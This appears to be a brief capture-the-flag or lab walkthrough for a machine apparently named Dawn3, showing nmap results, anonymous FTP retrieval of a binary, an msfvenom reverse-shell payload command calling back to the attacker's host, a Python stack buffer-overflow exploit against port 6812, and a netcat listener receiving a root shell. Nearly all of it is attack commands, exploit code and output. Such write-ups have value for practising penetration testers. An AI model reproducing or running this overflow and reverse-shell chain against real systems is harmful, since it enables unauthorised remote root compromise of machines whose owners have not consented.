PORT STATE SERVICE VERSION
2100/tcp open ftp pyftpdlib 1.5.6
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwsrwxrwx 1 dawn3 dawn3 292728 Mar 08 2020 dawn3.exe [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.158.13:2100
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
6812/tcp closed unknown
We can login to FTP anonymously and we have port 6812 not knowing what it does
ftp> ls -la
-rwsrwxrwx 1 dawn3 dawn3 292728 Mar 08 2020 dawn3.exe
ftp> get dawn3.exe
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.49.161 LPORT=443 EXITFUNC=thread -f c -b "\\x00"
import socket, sys, struct
shell = ()
jmpesp = struct.pack("<I", 0x52501513)
buffer = "A"*524 + jmpesp + "\\x90"*10 + shell + "C" * (888 - 524 - 4 - len(shell))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.xxx", 6812))
print("Sending payload")
s.send(buffer)
s.close()
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.49.161] from (UNKNOWN) [192.168.161.13] 53320
whoami
root